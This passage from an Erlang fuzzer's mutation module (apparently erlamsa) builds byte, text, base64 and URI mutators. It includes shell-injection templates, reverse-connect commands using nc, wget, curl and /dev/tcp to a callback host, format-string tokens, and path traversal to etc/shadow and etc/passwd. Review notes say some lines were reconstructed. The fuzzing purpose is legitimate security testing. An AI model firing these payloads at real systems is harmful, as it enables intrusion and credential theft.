    get_num(Rest, Acc * 10 + (C - $0), Digits + 1, Sign);
%% A leading minus (before any digit) flips the sign.
get_num(<<$-, Rest/binary>>, Acc, 0, _Sign) ->
    get_num(Rest, Acc, 0, -1);
get_num(Rest, _Acc, 0, _Sign) -> {false, Rest};
get_num(Rest, Acc, _Digits, Sign) -> {Sign * Acc, Rest}.
-spec copy_range(binary(), binary(), binary()) -> binary().
%% Copy bytes from the first binary until its suffix equals End, then
%% continue with Tail instead of that suffix.
copy_range(End, End, Tail) -> Tail;
copy_range(<<Byte:8, Rest/binary>>, End, Tail) ->
    Copied = copy_range(Rest, End, Tail),
    <<Byte:8, Copied/binary>>.
-spec mutate_a_num(binary(), integer()) -> {integer(), binary()}.
mutate_a_num(<<>>, NFound) ->
Which = erlamsa_rnd:rand(NFound),
{Which, <<>>};
mutate_a_num(Lst = <<H:8, T/binary>>, NFound) ->
{ValP, LstP} = get_num(Lst),
if
ValP =/= false ->
{Which, Tail} = mutate_a_num(LstP, NFound + 1),
case Which of
0 ->
NewNum = mutate_num(ValP),
BinNewNum = list_to_bitstring(integer_to_list(NewNum)),
{-1, erlamsa_utils:merge(BinNewNum, Tail)};
_Else ->
{Which - 1, copy_range(Lst, LstP, Tail)}
end;
true ->
{Which, Tail} = mutate_a_num(T, NFound),
{Which, <<H:8, Tail/binary>>}
end.
-spec sed_num(list_of_bins(), meta_list()) -> mutation_res().
%% Number mutator: mutate one textual number in the head block (chosen
%% uniformly among all numbers found), then re-flush the result.
%% Returns the standard {NextMutator, Data, Meta, PriorityDelta} tuple.
sed_num([H|T], Meta) ->
    {N, Lst} = mutate_a_num(H, 0),
    IsBin = erlamsa_utils:binarish(Lst),
    FlushedLst = erlamsa_utils:flush_bvecs(Lst, T),
    if
        %% N =:= 0 means no number was found in this block.
        N =:= 0 ->
            R = erlamsa_rnd:rand(10), %% low priority negative, because could be textual with less frequent numbers
            case R of
                0 -> {fun sed_num/2, FlushedLst, [{muta_num, 0}|Meta], -1};
                _Else -> {fun sed_num/2, FlushedLst, [{muta_num, 0}|Meta], 0}
            end;
        %% Binary-looking data: numbers are less meaningful, lower priority.
        IsBin =:= true ->
            {fun sed_num/2, FlushedLst, [{muta_num, 1}|Meta], -1};
        %% Textual data with a mutated number: boost priority.
        true ->
            {fun sed_num/2, FlushedLst, [{muta_num, 1}|Meta], +2}
    end.
%%%
%%% Single Byte-level Mutations
%%%
-spec construct_sed_byte_muta(byte_edit_fun(), atom()) -> mutation_fun().
%% Build a single-byte mutator: applies edit function F at a random byte
%% position of the head block, tagging metadata with Name.
construct_sed_byte_muta(F, Name) ->
    fun Self([H|T], Meta) ->
        P = erlamsa_rnd:rand(byte_size(H)),
        D = erlamsa_rnd:rand_delta(),
        {Self, [edit_byte_vector(H, P, F) | T], [{Name, D}|Meta], D}
    end.
-spec construct_sed_byte_drop() -> mutation_fun().
construct_sed_byte_drop() -> %% drop byte
construct_sed_byte_muta(fun (B) -> <<B:0>> end, byte_drop).
-spec construct_sed_byte_inc() -> mutation_fun().
%% NOTE(review): the function head on this clause was lost in extraction
%% (only its trailing comment survived); restored from the -spec above
%% and the intact construct_sed_byte_drop/repeat siblings.
construct_sed_byte_inc() -> %% inc byte mod 256
    construct_sed_byte_muta(fun (B) -> C = (B + 1) band 255, <<C:8>> end, byte_inc).
-spec construct_sed_byte_dec() -> mutation_fun().
%% NOTE(review): the function head on this clause was lost in extraction
%% (only its trailing comment survived); restored from the -spec above
%% and the intact construct_sed_byte_drop/repeat siblings.
construct_sed_byte_dec() -> %% dec byte mod 256
    construct_sed_byte_muta(fun (B) -> C = (B - 1) band 255, <<C:8>> end, byte_dec).
-spec construct_sed_byte_repeat() -> mutation_fun().
construct_sed_byte_repeat() -> %% repeat a byte
construct_sed_byte_muta(fun (B) -> <<B:8, B:8>> end, byte_repeat).
-spec construct_sed_byte_flip() -> mutation_fun().
construct_sed_byte_flip() -> %% flip a bit in a byte
construct_sed_byte_muta(
fun (B) ->
Flip = erlamsa_rnd:rand(8),
Mask = 1 bsl Flip,
C = B bxor Mask,
<<C:8>>
end, byte_flip).
-spec construct_sed_byte_insert() -> mutation_fun().
construct_sed_byte_insert() -> %% insert a byte
construct_sed_byte_muta(
fun (B) ->
NewByte = erlamsa_rnd:rand(256),
<<NewByte:8, B:8>>
end, byte_insert).
-spec construct_sed_byte_random() -> mutation_fun().
%% NOTE(review): the function head was lost in extraction (only its
%% trailing comment survived); restored from the -spec above.
construct_sed_byte_random() -> %% swap a byte with a random one
    construct_sed_byte_muta(
        fun (_B) ->
            NewByte = erlamsa_rnd:rand(256),
            <<NewByte:8>>
        end, byte_swap_random).
%%%
%%% Multiple Byte-level Mutations
%%%
%% Warning: these implementations are not radamsa-like; they only do "similar" things, in a different way and with slight differences
%-spec construct_sed_bytes_muta(byte_edit_fun(), atom()) -> mutation_fun().
-spec construct_sed_bytes_muta(fun(), atom()) -> mutation_fun().
%% Build a multi-byte mutator: picks a random start S and length L inside
%% the head block, splits it as <<H, P, T>> and lets F rebuild the output
%% list from those pieces.  F takes (Prefix, Picked, Suffix, TailBlocks).
construct_sed_bytes_muta(F, Name) ->
    fun
        Self([<<>>|BTail], Meta) ->
            {Self, [<<>>|BTail], [{Name, -1}|Meta], -1};
        Self([BVec|BTail], Meta) ->
            BSize = byte_size(BVec),
            S = erlamsa_rnd:rand(BSize),
            L = erlamsa_rnd:rand_range(1, BSize - S + 1),
            %% WARN: ^ here any (min 2), in radamsa 20: magic constant,
            %% should use something like repeat-len
            %% ^^ check may be max(20, ...) with "MAGIX" could be MORE effective
            H_bits = S*8,
            P_bits = L*8,
            <<H:H_bits, P:P_bits, T/binary>> = BVec,
            C = F(<<H:H_bits>>, <<P:P_bits>>, T, BTail),
            D = erlamsa_rnd:rand_delta(),
            {Self, C, [{Name, BSize}|Meta], D}
    end.
-spec construct_sed_bytes_perm() -> mutation_fun().
%% WARN: in radamsa max permutation block could not exceed length 20, here could be any length
construct_sed_bytes_perm() -> %% permute a few bytes
    construct_sed_bytes_muta(
        fun (H, Bs, T, BTail) ->
            C = list_to_binary(
                erlamsa_rnd:random_permutation(
                    binary_to_list(Bs))),
            [<<H/binary, C/binary, T/binary>> | BTail]
        end, seq_perm).
-spec construct_sed_bytes_repeat() -> mutation_fun().
construct_sed_bytes_repeat() -> %% repeat a seq
    construct_sed_bytes_muta(
        fun (H, Bs, T, BTail) ->
            %% NOTE(review): the binding of N was lost in extraction (only
            %% the comment "max 2^10 = 1024 stuts" survived); restored as a
            %% log-distributed repeat count of at least 2 -- confirm
            %% against upstream erlamsa sources.
            N = max(2, erlamsa_rnd:rand_log(10)), %% max 2^10 = 1024 stuts
            C = list_to_binary([Bs || _ <- lists:seq(1,N)]),
            Res = [<<H/binary, C/binary ,T/binary>> | BTail],
            Res
        end, seq_repeat).
-spec construct_sed_bytes_drop() -> mutation_fun().
construct_sed_bytes_drop() -> %% drop a seq
construct_sed_bytes_muta(
fun (H, _Bs, T, BTail) ->
[<<H/binary, T/binary>> | BTail] end, seq_drop).
-spec randmask(fun(), list()) -> list().
%% randomly applies maskfunction byte-per-byte to list with pre-randomized prob.
randmask(MaskFun, Ll) ->
MaskProb = erlamsa_rnd:erand(100),
randmask_loop(MaskFun, MaskProb, erlamsa_rnd:rand_occurs_fixed(MaskProb, 100), Ll, []).
-spec randmask_loop(fun(), non_neg_integer(), non_neg_integer(), list(), list()) -> list().
randmask_loop(_MaskFun, _MaskProb, _, [], Out) ->
lists:reverse(Out);
randmask_loop(MaskFun, MaskProb, true, [H | T], Out) ->
randmask_loop(MaskFun, MaskProb, erlamsa_rnd:rand_occurs_fixed(MaskProb, 100), T, [MaskFun(H) | Out]);
randmask_loop(MaskFun, MaskProb, false, [H | T], Out) ->
randmask_loop(MaskFun, MaskProb, erlamsa_rnd:rand_occurs_fixed(MaskProb, 100), T, [H | Out]).
-spec mask_nand(byte()) -> byte().
mask_nand(B) ->
B band (bnot (1 bsl erlamsa_rnd:rand(8))).
-spec mask_or(byte()) -> byte().
mask_or(B) ->
B bor (1 bsl erlamsa_rnd:rand(8)).
-spec mask_xor(byte()) -> byte().
mask_xor(B) ->
B bxor (1 bsl erlamsa_rnd:rand(8)).
-spec mask_replace(byte()) -> byte().
mask_replace(_) ->
erlamsa_rnd:rand(256).
-spec construct_sed_bytes_randmask(list(fun())) -> mutation_fun().
%% WARNING: in radamsa max permutation block could not exceed length 20, here could be any length
%% Build a mutator that applies one randomly chosen bit-mask function
%% byte-per-byte (with random probability) over a random sub-sequence.
construct_sed_bytes_randmask(MaskFunList) ->
    MaskFun = erlamsa_rnd:rand_elem(MaskFunList),
    construct_sed_bytes_muta(
        fun (H, Bs, T, BTail) ->
            C = list_to_binary(
                randmask(MaskFun, binary_to_list(Bs))),
            [<<H/binary, C/binary, T/binary>> | BTail]
        end, seq_randmask).
%%
%% Lines
%%
-spec lines(binary()) -> [string()].
%% bvec -> ([... , 10] .. [... , 10]), cut after newlines
%% Split a binary into character lists; each line KEEPS its trailing
%% newline, and a final line without a newline is kept as-is.
lines(Bvec) -> lines(binary_to_list(Bvec), [], []).
lines([], [], Out) -> lists:reverse(Out);
lines([], Buff, Out) -> lists:reverse([lists:reverse(Buff)] ++ Out);
lines([10|T], Buff, Out) -> lines(T, [], [lists:reverse([10 | Buff]) | Out]);
lines([H|T], Buff, Out) -> lines(T, [H | Buff], Out).
-spec unlines([string()]) -> binary().
%% Lst -> bvec: concatenate the byte strings back into one binary.
unlines(Lines) ->
    erlang:iolist_to_binary(Lines).
-spec try_lines(binary()) -> [string()] | false.
%% #u8[byte ...] -> ((byte ... 10) ...) | #false, if this doesn't look like line-based text data
%% TODO: ugly code, need a bit refactor
try_lines(Bvec) ->
    Ls = lines(Bvec),
    IsBin = erlamsa_utils:binarish(Bvec),
    if
        Ls =:= [] -> false;
        IsBin =:= true -> false;
        true -> Ls
    end.
-spec construct_line_muta(fun(), atom()) -> mutation_fun().
construct_line_muta(Op, Name) ->
fun Self(Ll = [H|T], Meta) ->
Ls = try_lines(H),
if
Ls =:= false ->
{Self, Ll, Meta, -1};
true ->
MLs = Op(Ls, length(Ls)), % calc length only once
NH = unlines(MLs),
{Self, [NH | T], [{Name, 1}|Meta], 1}
end
end.
-spec construct_st_line_muta(fun(), atom(), list()) -> mutation_fun().
%% state is (n <line> ...)
construct_st_line_muta(Op, Name, InitialState) ->
fun (Ll = [H|T], Meta) ->
Ls = try_lines(H),
if
Ls =:= false ->
{construct_st_line_muta(Op, Name, InitialState),
Ll, Meta, -1};
true ->
{Stp, NewLs} = Op(InitialState, Ls),
{construct_st_line_muta(Op, Name, Stp),
[unlines(NewLs) | T], [{Name, 1} | Meta], 1}
end
end.
%%
%% Shared sequences
%%
-spec sed_fuse_this(list_of_bins(), meta_list()) -> mutation_res().
%% (a b ...) -> (a+a b ...)
%% NOTE(review): the function head was lost in extraction (only its
%% trailing comment survived); restored from the -spec and the use of
%% H and T in the surviving body.
sed_fuse_this([H|T], Meta) -> %% jump between two shared suffixes in the block
    Lst = binary_to_list(H),
    B = list_to_binary(erlamsa_fuse:fuse(Lst, Lst)),
    D = erlamsa_rnd:rand_delta(),
    {fun sed_fuse_this/2, [B | T], [{fuse_this, D}|Meta], D}.
-spec sed_fuse_next(list_of_bins(), meta_list()) -> mutation_res().
%% Fuse the first half of the head block into the next block, then fuse
%% the result back with the second half.
sed_fuse_next([H|T], Meta) ->
    {Al1, Al2} = erlamsa_utils:halve(binary_to_list(H)),
    {B, Ll} = erlamsa_utils:uncons(T, H), % next or current
    Bl = binary_to_list(B),
    Abl = erlamsa_fuse:fuse(Al1, Bl),
    Abal = erlamsa_fuse:fuse(Abl, Al2),
    D = erlamsa_rnd:rand_delta(),
    {fun sed_fuse_next/2,
        %% NOTE(review): this flush_bvecs line was lost in extraction (only
        %% its comment survived); restored per the parallel line in
        %% remember/1 below and the otherwise-unused Abal/Ll bindings.
        erlamsa_utils:flush_bvecs(list_to_binary(Abal), Ll), %% <- on avg 1x, max 2x block sizes
        [{fuse_next, D}|Meta], D}.
-spec remember(binary()) -> mutation_fun().
%% Build a mutator that carries a remembered Block and cross-fuses it
%% with the current head block, occasionally swapping which block is
%% remembered for the next round.
remember(Block) ->
    fun ([H|T], Meta) ->
        %% TODO: Check -- in radamsa here using owllisp halve instead of split
        {Al1, Al2} = erlamsa_utils:halve(binary_to_list(H)),
        {Ol1, Ol2} = erlamsa_utils:halve(binary_to_list(Block)),
        A = erlamsa_fuse:fuse(Al1, Ol1), % a -> o
        B = erlamsa_fuse:fuse(Ol2, Al2), % o -> a
        Swap = erlamsa_rnd:rand(3),
        D = erlamsa_rnd:rand_delta(),
        NewBlock = case Swap of
            0 -> H;
            _Else -> Block
        end,
        {remember(NewBlock),
            %% NOTE(review): the outer flush_bvecs call was lost in
            %% extraction (only its comment survived); restored from the
            %% surviving inner call and its unbalanced closing parens.
            erlamsa_utils:flush_bvecs(list_to_binary(A), %% <- on avg 1x, max 2x block sizes
                erlamsa_utils:flush_bvecs(list_to_binary(B), T)),
            [{fuse_old, D}|Meta], D}
    end.
-spec sed_fuse_old(list_of_bins(), meta_list()) -> mutation_res().
sed_fuse_old(Ll = [H|_], Meta) ->
R = remember(H),
R(Ll, Meta).
%%
%% ASCII string mutations (use UTF-8 later)
%%
%%% Text mutations
%% check that the nodes do look stringy enough to mutate with these
%% heuristics, meaning there are some nodes and/or just one, but it's
%% stringy
%% in radamsa this will stop if found byte node; here, we continue
-spec stringy(list(byte())) -> false | true.
stringy([]) -> false;
stringy([{byte, _} | T]) -> false or stringy(T);
%% NOTE(review): the final clause was lost in extraction (only its
%% comment survived); restored so that any non-byte chunk (text or
%% delimited) makes the lexed list "stringy enough" to mutate.
stringy(_) -> true. %% in radamsa -- length(Cs)
-spec silly_strings() -> list(string()).
%% NOTE(review): the function head was lost in extraction (only its
%% trailing comment survived); restored from the -spec above.
%% Format-string tokens, NUL/newline/CR/tab/backspace and an "aaaa"
%% run -- classic parser-upsetting payloads.
silly_strings() -> %% added \r
    ["%n", "%n", "%s", "%d", "%p", "%#x", [0], "aaaa%d%n", [10], [13], [9], [8]].
-spec delimeters() -> list(string()).
delimeters() ->
["'", "\"", "'", "\"", "'", "\"", "&", ":", "|", ";",
"\\", [10], [13], [9], " ", "`", [0], "]", "[", ">", "<"].
-spec shellinjects() -> list(string()).
shellinjects() ->
[
"';~s;'", "\";~s;\"", ";~s;", "|~s#",
"^ ~s ^", "& ~s &", "&& ~s &&", "|| ~s ||",
"%0D~s%0D", "`~s`"
].
-spec revconnects() -> list(string()).
revconnects() ->
[
"calc.exe & notepad.exe ~s ~p ", "nc ~s ~p", "wget http://~s:~p", "curl ~s ~p",
"exec 3<>/dev/tcp/~s/~p", "sleep 100000 # ~s ~p ", "echo>/tmp/erlamsa.~s.~p"
].
-spec random_badness() -> list().
random_badness() ->
random_badness(erlamsa_rnd:rand(20) + 1, []).
-spec random_badness(non_neg_integer(), list()) -> list().
random_badness(0, Out) -> Out;
random_badness(N, Out) ->
X = erlamsa_rnd:rand_elem(silly_strings()),
random_badness(N - 1, X ++ Out).
-spec overwrite(list(), list()) -> list().
%% Write New over the head of Old: keep Old's tail when New is shorter,
%% keep New's excess when Old runs out first.
overwrite(New, Old) ->
    case {New, Old} of
        {[], _} -> Old;
        {[H | T], [_ | OldT]} -> [H | overwrite(T, OldT)];
        {[H | T], _} -> [H | overwrite(T, Old)]
    end.
-spec rand_as_count() -> non_neg_integer().
rand_as_count() ->
Type = erlamsa_rnd:rand(11),
case Type of
0 -> 127;
1 -> 128;
2 -> 255;
3 -> 256;
4 -> 16383;
5 -> 16384;
6 -> 32767;
7 -> 32768;
8 -> 65535;
9 -> 65536;
_Else -> erlamsa_rnd:rand(1024)
end.
-spec push_as(non_neg_integer(), list()) -> list().
%% Prepend N literal $a characters onto Tail.
push_as(N, Tail) ->
    lists:duplicate(N, $a) ++ Tail.
-spec insert_traversal(char()) -> list().
insert_traversal(Symb) ->
[Symb | lists:flatten(lists:map(fun (_) -> [$., $., Symb] end, lists:seq(1, erlamsa_rnd:erand(10))))].
-spec mutate_text_data(string(), [text_mutators()]) -> string().
mutate_text_data(Lst, TxtMutators) ->
mutate_text(erlamsa_rnd:rand_elem(TxtMutators), Lst).
-spec buildrevconnect() -> string().
%% Build a shell-injection payload: a random reverse-connect command
%% (aimed at the SSRF endpoint) wrapped in a random injection template.
%% NOTE(review): get_ssrf_ep/0 is presumably defined later in this file
%% alongside the exported get_ssrf_uri/0 -- confirm it returns {IP, Port}.
buildrevconnect() ->
    Inj = erlamsa_rnd:rand_elem(shellinjects()),
    Rev = erlamsa_rnd:rand_elem(revconnects()),
    {IP, Port} = get_ssrf_ep(),
    lists:flatten(io_lib:format(Inj, [io_lib:format(Rev, [IP, Port])])).
-spec mutate_text(text_mutators(), string()) -> string().
%% Apply one concrete text mutation to the character list Lst.
%% NOTE(review): several `P = erlamsa_rnd:erand(length(Lst))` bindings and
%% the insert_badness applynth line were lost in extraction (only their
%% trailing comments survived); restored from the surviving parallel
%% clauses (insert_aaas / insert_traversal / insert_delimeter).
%% insert badness
mutate_text(insert_badness, []) -> random_badness(); %% empty list -- just insert random
mutate_text(insert_badness, Lst) ->
    P = erlamsa_rnd:erand(length(Lst)), %% in erlang lists starts from 1
    Bad = random_badness(),
    erlamsa_utils:applynth(P, Lst, fun(E, R) -> Bad ++ [E|R] end); %% TODO: check before or after E, in radamsa Bad ++ [X]
%% replace badness
mutate_text(replace_badness, []) -> random_badness(); %% empty list -- just replace with random
mutate_text(replace_badness, Lst) ->
    P = erlamsa_rnd:erand(length(Lst)), %% in erlang lists starts from 1
    Bad = random_badness(),
    lists:sublist(Lst, P - 1) ++ overwrite(lists:nthtail(P, Lst), Bad);
%% insert as
mutate_text(insert_aaas, []) -> push_as(rand_as_count(), []); %% empty list -- just insert random
mutate_text(insert_aaas, Lst) ->
    N = rand_as_count(),
    P = erlamsa_rnd:erand(length(Lst)), %% in erlang lists starts from 1
    lists:sublist(Lst, P - 1) ++ push_as(N, lists:nthtail(P, Lst));
%% insert path traversal
mutate_text(insert_traversal, []) -> insert_traversal("/"); %% empty list -- just insert random
mutate_text(insert_traversal, Lst) ->
    P = erlamsa_rnd:erand(length(Lst)), %% in erlang lists starts from 1
    lists:sublist(Lst, P - 1)
        ++ insert_traversal(erlamsa_rnd:rand_elem(["\\", "/"]))
        ++ lists:nthtail(P, Lst);
%% insert null
mutate_text(insert_null, Lst) ->
    Lst ++ [0];
%% insert delimeter
mutate_text(insert_delimeter, []) -> [erlamsa_rnd:rand_elem(delimeters())]; %% empty list -- just insert random
mutate_text(insert_delimeter, Lst) ->
    P = erlamsa_rnd:erand(length(Lst)), %% in erlang lists starts from 1
    Bad = erlamsa_rnd:rand_elem(delimeters()),
    erlamsa_utils:applynth(P, Lst, fun(E, R) -> Bad ++ [E|R] end); %% TODO: check before or after E
%% insert shell injection
mutate_text(insert_shellinj, []) -> [erlamsa_rnd:rand_elem(delimeters())]; %% empty list -- just insert random
mutate_text(insert_shellinj, Lst) ->
    P = erlamsa_rnd:erand(length(Lst)), %% in erlang lists starts from 1
    ShellInj = buildrevconnect(),
    erlamsa_utils:applynth(P, Lst, fun(E, R) -> ShellInj ++ [E|R] end).
%% Generic ASCII Bad mutation
%% In Radamsa, this function will work only if Cs started as a string
%% Else, if Cs contains only byte nodes, it will run infinitely
%% Here, we do maximum L/4 runs in this case
%% TODO: WARN: Ineffective, need rewrite/optimize
-spec string_generic_mutate(chunk_list(), [text_mutators()], non_neg_integer(), non_neg_integer()) -> chunk_list().
%% Mutate one randomly chosen text/delimited chunk; byte chunks are
%% retried, giving up after L/4 attempts (R counts retries).
string_generic_mutate(Cs, _, L, R) when R > L/4 -> Cs;
string_generic_mutate(Cs, TxtMutators, L, R) ->
    %% NOTE(review): the binding of P was lost in extraction (only its
    %% comment survived); restored per the lists:nth(P, Cs) use below.
    P = erlamsa_rnd:erand(length(Cs)), %% in erlang, list is beginning from index 1
    El = lists:nth(P, Cs),
    case El of
        {text, Bs} ->
            Data = mutate_text_data(Bs, TxtMutators),
            erlamsa_utils:applynth(P, Cs, fun(_E, Rest) -> [{text, Data} | Rest] end); % [Node]
        {byte, _Bs} ->
            string_generic_mutate(Cs, TxtMutators, L, R + 1);
        {delimited, Left, Bs, Right} ->
            erlamsa_utils:applynth(P, Cs, fun (_E, Rest) -> [{delimited, Left, mutate_text_data(Bs, TxtMutators), Right}] ++ Rest end)
    end.
-spec construct_ascii_mutator(fun(), atom()) -> mutation_fun().
%% Build an ASCII mutator: lex the head block, let Fun mutate the chunk
%% list if it looks stringy, then unlex back to a binary.
%% NOTE(review): the `case stringy(Cs) of` line and the `false ->` clause
%% head were lost in extraction (only their comments survived); restored
%% from the surviving true-branch and the dangling `end` pair.
construct_ascii_mutator(Fun, Name) ->
    fun Ascii_mutator (Ll = [H|T], Meta) ->
        Data = binary_to_list(H),
        Cs = erlamsa_strlex:lex(Data),
        case stringy(Cs) of %% in radamsa stringy_length
            true -> % do something bad...
                Ms = Fun(Cs),
                D = erlamsa_rnd:rand_delta(),
                BinData = list_to_binary(erlamsa_strlex:unlex(Ms)),
                {Ascii_mutator,
                 [BinData | T],
                 [{Name, D}|Meta], D};
            false -> %% not a string at all (even 1 node), skipping
                {Ascii_mutator, Ll, Meta, -1}
        end
    end.
%% Mutator that enhances silly issues in ASCII string data handling by
%% applying one of the "bad content" text mutations to a random text chunk.
-spec construct_ascii_bad_mutator() -> mutation_fun().
construct_ascii_bad_mutator() ->
    construct_ascii_mutator(
        fun (Cs) -> string_generic_mutate(Cs,
                        [insert_badness, replace_badness, insert_traversal, insert_aaas, insert_null],
                        length(Cs), 0)
        end,
        ascii_bad).
-spec drop_delimeter(non_neg_integer(), chunk()) -> chunk().
%% drop one (or both, or zero) delimeters from a {delimited, ...} chunk;
%% any other chunk -- or a roll of 3 -- is returned unchanged.
drop_delimeter(0, {delimited, Left, Bs, _Right}) -> % drop right
    {text, [Left|Bs]};
drop_delimeter(1, {delimited, _Left, Bs, Right}) -> % drop left
    {text, Bs ++ [Right]};
drop_delimeter(2, {delimited, _Left, Bs, _Right}) -> % drop both
    {text, Bs};
drop_delimeter(_, El) -> % drop none
    El.
%% Play with delimeters
-spec string_delimeter_mutate(chunk_list(), non_neg_integer(), non_neg_integer()) -> chunk_list().
%% Pick a random chunk: insert delimeters/shell injections into text chunks,
%% or drop delimeter(s) of a delimited chunk; byte chunks retried <= L/4 times.
string_delimeter_mutate(Cs, L, R) when R > L/4 -> Cs;
string_delimeter_mutate(Cs, L, R) ->
    P = erlamsa_rnd:erand(length(Cs)), %% in erlang, list is beginning from index 1
    El = lists:nth(P, Cs),
    case El of
        {text, Bs} -> %% insert or drop special delimeter(s)
            Data = mutate_text_data(Bs, [erlamsa_rnd:rand_elem(
                                            [
                                                insert_delimeter, insert_delimeter,
                                                insert_delimeter, insert_shellinj
                                            ])
                                        ]),
            erlamsa_utils:applynth(P, Cs, fun(_E, Rest) -> [{text, Data}|Rest] end); % [Node]
        {byte, _Bs} -> %% do nothing
            string_delimeter_mutate(Cs, L, R + 1);
        {delimited, _Left, _Bs, _Right} ->
            Drop = drop_delimeter(erlamsa_rnd:rand(4), El),
            erlamsa_utils:applynth(P, Cs, fun(_E, Rest) -> [Drop|Rest] end)
    end.
%% Mutator that plays with delimeters in ASCII string data.
-spec construct_ascii_delimeter_mutator() -> mutation_fun().
construct_ascii_delimeter_mutator() ->
    construct_ascii_mutator(
        fun (Cs) -> string_delimeter_mutate(Cs, length(Cs), 0)
        end,
        ascii_delimeter).
%%
%% Base64 Mutator
%%
%% Base64 mutator: lex the head binary, try to base64-decode every text
%% chunk longer than 6 chars; on success, run a randomly chosen inner
%% mutator over the decoded bytes and re-encode. Chunks that fail to
%% decode are kept as-is (decode errors are swallowed on purpose).
-spec base64_mutator(list_of_bins(), meta_list()) -> mutation_res().
base64_mutator([H|T], Meta) ->
    Data = binary_to_list(H),
    Cs = erlamsa_strlex:lex(Data),
    MutasList = mutas_list(erlamsa_mutations:mutations([])),
    %io:format("~p ~n", [Cs]),
    {Ms, {NewD, NewMeta}} = lists:mapfoldl(
        fun
            ({text, A}, Acc = {DAcc, MAcc}) when length(A) > 6 ->
                try base64:decode(A) of
                    Bin ->
                        D = erlamsa_rnd:rand_delta(),
                        Muta = mutators_mutator(MutasList, []),
                        {_, NewLl, AddedMeta} = Muta([Bin], []),
                        NewBin = erlang:iolist_to_binary(NewLl),
                        {
                            {text, base64:encode_to_string(NewBin)},
                            {DAcc + D, [AddedMeta, {base64_mutator, D} | MAcc]}
                        }
                catch
                    error:badarg ->
                        {{text, A}, Acc}; % not valid base64 -- keep chunk
                    error:function_clause ->
                        {{text, A}, Acc};
                    _:_ ->
                        {{text, A}, Acc}
                end;
            (Lex, Acc) -> {Lex, Acc}
        end,
        {-1, Meta}, Cs),
    %io:format("~p~n", [Ms]),
    BinData = list_to_binary(erlamsa_strlex:unlex(Ms)),
    {fun base64_mutator/2, [BinData | T], NewMeta, NewD}.
%%
%% URI SSRF/Path traversal Mutator
%%
%% need this wrapper in case if ets process not started (erlamsa_app:start haven't called)
%% Resolve the SSRF callback endpoint; any failure (e.g. the global_config
%% ETS table missing because erlamsa_app:start was never called) falls back
%% to the default endpoint.
-spec get_ssrf_ep() -> {string(), integer()}.
get_ssrf_ep() ->
    try
        get_ssrf_ep_unsafe()
    catch
        _:_ -> {"localhost", 51234}
    end.
%% Read the SSRF callback host/port from the global_config ETS table.
%% Port: cm_port or 51234. Host preference: user-supplied cm_host_user,
%% then system-detected cm_host (an inet address, formatted), else localhost.
%% Crashes if the ETS table does not exist -- callers go via get_ssrf_ep/0.
-spec get_ssrf_ep_unsafe() -> {string(), integer()}.
get_ssrf_ep_unsafe() ->
    SSRFPort = case ets:match(global_config, {cm_port, '$1'}) of
        [[Port]] -> Port;
        _ -> 51234
    end,
    SSRFSystemHost = case ets:match(global_config, {cm_host, '$1'}) of
        [[SHost]] -> SHost;
        _ -> {}
    end,
    SSRFUserHost = case ets:match(global_config, {cm_host_user, '$1'}) of
        [[UHost]] -> UHost;
        _ -> {}
    end,
    SSRFHost = case {SSRFSystemHost, SSRFUserHost} of
        {{}, {}} -> "localhost";
        {SSRFSystemHost, {}} -> inet:ntoa(SSRFSystemHost);
        {_, SSRFUserHost} -> SSRFUserHost;
        _ -> "localhost"
    end,
    {SSRFHost, SSRFPort}.
%% Format the SSRF endpoint as a scheme-less URI suffix, e.g. "://host:port/".
%% Returns an io_lib deep list, not a flat string.
-spec get_ssrf_uri() -> list().
get_ssrf_uri() ->
    {SSRFHost, SSRFPort} = get_ssrf_ep(),
    io_lib:format("://~s:~p/", [SSRFHost, SSRFPort]).
%% replace file with http
%% The argument is a scheme accumulated in REVERSE order: if it spells
%% "file" (reversed "elif"), substitute "http"; otherwise just un-reverse it.
-spec change_scheme(list()) -> list().
change_scheme("elif" ++ Rest) -> lists:reverse("ptth" ++ Rest);
change_scheme(Reversed) -> lists:reverse(Reversed).
%% Mutate a URI (split at "://"): T is the part after the scheme, Acc the
%% reversed scheme. Variant 1: point the URI at the SSRF endpoint.
%% Variant 2: inject "@host:port" after the domain (userinfo trick).
%% Variant 3: replace the path with "../" traversal to a sensitive file.
-spec rand_uri_mutate(string(), string(), integer()) -> {string(), integer(), list()}.
rand_uri_mutate(T, Acc, 1) ->
    {change_scheme(Acc) ++ get_ssrf_uri() ++ T, 1, {uri, success}};
rand_uri_mutate(T, Acc, 2) ->
    {SSRFHost, SSRFPort} = get_ssrf_ep(),
    AtAddr = lists:flatten(io_lib:format(erlamsa_rnd:rand_elem([" @~s:~p", "@~s:~p"]),
                                         [SSRFHost, SSRFPort])
             ),
    [Domain | Query] = string:tokens(T, "/"),
    Modified = lists:flatten([change_scheme(Acc), "://", Domain, AtAddr, $/, string:join(Query,"/")]),
    {Modified, 1, {uri, success}};
rand_uri_mutate(T, Acc, 3) ->
    [Domain | Query] = string:tokens(T, "/"),
    %% 1..10 "../" segments, then either the original path or a known target
    Traversals = ["/" | lists:map(fun (_) -> "../" end, lists:seq(1, erlamsa_rnd:erand(10)))],
    NewQuery = Traversals ++ case erlamsa_rnd:erand(4) of
                                 1 -> string:join(Query, "/");
                                 2 -> "Windows/win.ini";
                                 3 -> "etc/shadow";
                                 4 -> "etc/passwd"
                             end,
    {lists:reverse(Acc) ++ "://" ++ Domain ++ lists:flatten(NewQuery), 1, {uri, success}}.
%% Scan a string for "://"; if found, mutate the URI around it (the scheme is
%% accumulated reversed in Acc). Returns {String, Delta, MetaEntry} where
%% Delta is 0 and MetaEntry [] when no URI was found.
-spec try_uri_mutate(list()) -> {list(), integer(), list()}.
try_uri_mutate(Lst) -> try_uri_mutate(Lst, []).

-spec try_uri_mutate(list(), list()) -> {list(), integer(), list()}.
try_uri_mutate([ $:, $/, $/ | T], Acc) ->
    rand_uri_mutate(T, Acc, erlamsa_rnd:erand(3));
try_uri_mutate([], Acc) -> {lists:reverse(Acc), 0, []};
try_uri_mutate([H|T], Acc) ->
    try_uri_mutate(T, [H|Acc]).
%% URI SSRF/path-traversal mutator: lex the head binary and try to mutate
%% every text chunk longer than 5 chars that contains a "://" URI.
-spec uri_mutator(list_of_bins(), meta_list()) -> mutation_res().
uri_mutator([H|T], Meta) ->
    Cs = erlamsa_strlex:lex(binary_to_list(H)),
    {Ms, {NewD, NewMeta}} = lists:mapfoldl(
        fun
            ({text, A}, {DAcc, MAcc}) when length(A) > 5 ->
                {MutA, D, MutMeta} = try_uri_mutate(A),
                {{text, MutA}, {DAcc + D, [MutMeta | MAcc]}};
            (Lex, Acc) -> {Lex, Acc}
        end,
